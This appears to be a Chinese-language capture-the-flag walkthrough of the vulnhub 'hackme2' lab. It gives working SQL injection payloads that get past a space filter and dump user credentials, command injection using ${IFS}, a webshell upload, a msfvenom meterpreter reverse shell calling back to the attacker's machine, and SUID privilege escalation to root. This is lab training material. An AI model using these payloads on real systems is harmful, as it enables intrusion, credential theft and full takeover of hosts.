vulnbuh-hackme2

vulnbuh-hackme2靶机

环境

目标主机ip 192.168.10.147

攻击机 kali 192.168.143

​ 物理机 windows

信息收集

对目标主机进行端口扫描

nmap -sS -A 192.168.10.147

开放端口 22和80

访问目标主机80

一个登录页面

注册并登录

一个搜索框

直接点击搜索 显示book

使用书名搜索 OSINT

搜索框 可能存在sql注入漏洞，尝试验证一下

输入 OSINT’

没有任何回显

添加过滤

OSINT’ – + – +无回显

OSINT’ # # 返回正常搜索结果

存在sql注入漏洞

漏洞利用

已经验证存在sql注入漏洞了，继续去利用这个漏洞

使用order by 猜测字段

OSINT’ order by 3#

并无任何回显，猜测可能有过滤，

fuzz一波

发现过滤了空格

使用注释绕过空格过滤

OSINT'order/**/by/**/1#

判断字段数为3

使用union 联合查询

查看回显

OSINT'union/**/select/**/1,2,3#

常规操作，爆库，爆表，爆字段

OSINT'union/**/select/**/database(),2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()#

OSINT'union/**/select/**/database(),2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='users'#

OSINT'union/**/select/**/user,pasword,3/**/from/**/users#

找到一个叫superadmin的用户

解密码

得到用户名和密码

superadmin/Uncrackable

使用 superadmin登录

有个文件上传点

尝试上传一句话木马
shell.jpg能成功上传，但是没有回显上传点

只能上传 jpg png gif 文件

暂时利用不起来

两个 查询框
这种框 一般尝试 命令执行或者是跨站脚本

输入 1+1 和2+2

我们关注到 2+2 被执行成了 4

这里可能存在 命令执行
万能phpinfo 打一下

回显phpinfo 存在 命令执行漏洞

尝试读出welcomeadmin.php 源码

关注到这里 空格被过滤了

我们尝试使用 < 来绕过空格
${IFS} 也可以

通过阅读源码找到 文件上传的 路径
访问我们刚刚上传的图片

图片存在但是并未解析成php

利用命令执行漏洞 将图片改为shell.php

system(‘mv$IFS/var/www/html/uploads/year2020/shell.jpg${IFS}/var/www/html/uploads/year2020/shell.php’)

使用蚁剑连接


成功getshell

访问/root的时候提示path not found or no permission 没有权限

需要进行提权

权限提升

使用msf生成php木马

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.10.143 -f raw >/root/test.php

使用蚁剑上传到目标主机

msf开启监听

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 192.168.10.143

msf6 exploit(multi/handler) > run

访问我们的test.php页面

成功获取meterpreter

查找suid 文件

find / -perm -4000 -type f 2>/dev/null

/home/legacy/touchmenot 这个文件可疑

执行文件

查看当前用户，已经是root

修改掉root的密码

登录主机

成功以root权限进入目标主机